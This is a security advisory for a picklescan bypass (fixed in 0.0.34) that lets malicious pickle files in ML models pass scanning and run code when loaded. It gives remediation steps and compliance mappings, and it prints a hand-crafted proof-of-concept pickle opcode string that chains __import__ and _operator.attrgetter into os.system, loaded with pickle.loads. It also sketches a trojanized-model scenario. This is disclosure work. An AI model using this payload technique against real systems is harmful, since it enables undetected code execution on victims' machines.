GHSA-46h3-79wf-xr6c

GHSA-46h3-79wf-xr6c HIGH
Published December 30, 2025
CISO Take

If your ML pipeline uses picklescan to gate model loading, upgrade to 0.0.34 immediately — prior versions have a confirmed bypass allowing malicious pickle files to pass as clean, leading to RCE on model load. This is a false-negative in a security control, which is worse than no control: it creates false confidence while providing zero protection. Treat any externally sourced model scanned with picklescan < 0.0.34 as potentially compromised.

Affected Systems

Package Ecosystem Vulnerable Range Patched
picklescan pip < 0.0.34 0.0.34

Do you use picklescan? You're affected.

Severity & Risk

CVSS 3.1
N/A
EPSS
N/A
KEV Status
Not in KEV
Sophistication
Moderate

Recommended Action

  1. 1) PATCH: Upgrade picklescan to >= 0.0.34 immediately — this is the only direct fix. 2) AUDIT: Review models validated with older picklescan versions, especially those sourced from external repositories; re-scan with the patched version. 3) DEFENSE-IN-DEPTH: Never rely solely on picklescan — add sandboxed model loading (isolated containers with no network egress), enforce model provenance verification (cryptographic hashes, signing via Sigstore/DVC), and restrict what model-loading processes can spawn. 4) DETECT: Monitor for unexpected process spawns, shell executions, or network connections initiated during model load operations. 5) POLICY: Enforce an allowlist of trusted model sources; require signed artifacts from external registries before any model enters your pipeline.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Art. 15 - Accuracy, robustness and cybersecurity Art. 17 - Quality management system Article 15 - Accuracy, robustness and cybersecurity Article 9 - Risk management system
ISO 42001
A.5.2 - AI Risk Assessment A.6.1 - AI System Design A.6.2 - AI risk assessment A.8.5 - AI system security
NIST AI RMF
GOVERN 1.7 - AI supply chain risk management GOVERN 6.2 - Policies for third-party AI and supply chain risk MEASURE 2.5 - AI risk measurement for acquired components MEASURE 2.6 - AI risk — security and resilience
OWASP LLM Top 10
LLM05 - Supply Chain Vulnerabilities LLM05:2025 - Supply Chain Vulnerabilities

Technical Details

NVD Description

### Summary Picklescan uses _operator.attrgetter, which is a built-in python library function to execute remote pickle files. ### Details The attack payload executes in the following steps: - First, the attacker crafts the payload by calling the _operator.attrgetter function in the reduce method. - Then, when the victim, after checking whether the pickle file is safe by using the Picklescan library and finding that this library doesn't detect any dangerous functions, decides to call pickle.load() on this malicious pickle file, it leads to remote code execution. ### PoC ``` import pickle import pickletools opcode3 = b'''cbuiltins __import__ (Vos tRp0 0c_operator attrgetter (Vsystem tR(g0 tR(Vecho "pwned by _operator.attrgetter" tR.''' pickletools.dis(opcode3) pickle.loads(opcode3) ``` This PoC can't be easily create by pickle.dumps, so it was manually built. ### Impact Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models. Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded. Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects. ### Report by Pinji Chen (cpj24@mails.tsinghua.edu.cn) from the NISL lab (https://netsec.ccert.edu.cn/about) at Tsinghua University, Guanheng Liu (coolwind326@gmail.com).

Exploitation Scenario

An attacker publishes a trojanized PyTorch model on HuggingFace under a convincing name (typosquatting a popular model). The model checkpoint contains a malicious pickle payload using _operator.attrgetter to chain __import__('os').system() calls — opcodes deliberately crafted to avoid picklescan's blocklist. An ML engineer downloads the model and runs picklescan as part of their standard security workflow; the tool reports zero detections. Trusting the scan result, the engineer loads the model with torch.load(), triggering the payload on the GPU training server — establishing a reverse shell or exfiltrating credentials from the ML environment. The entire attack is silent, bypasses the organization's assumed security control, and can propagate further if the compromised server has access to shared model storage or internal APIs.

Timeline

Published
December 30, 2025
Last Modified
December 30, 2025
First Seen
March 24, 2026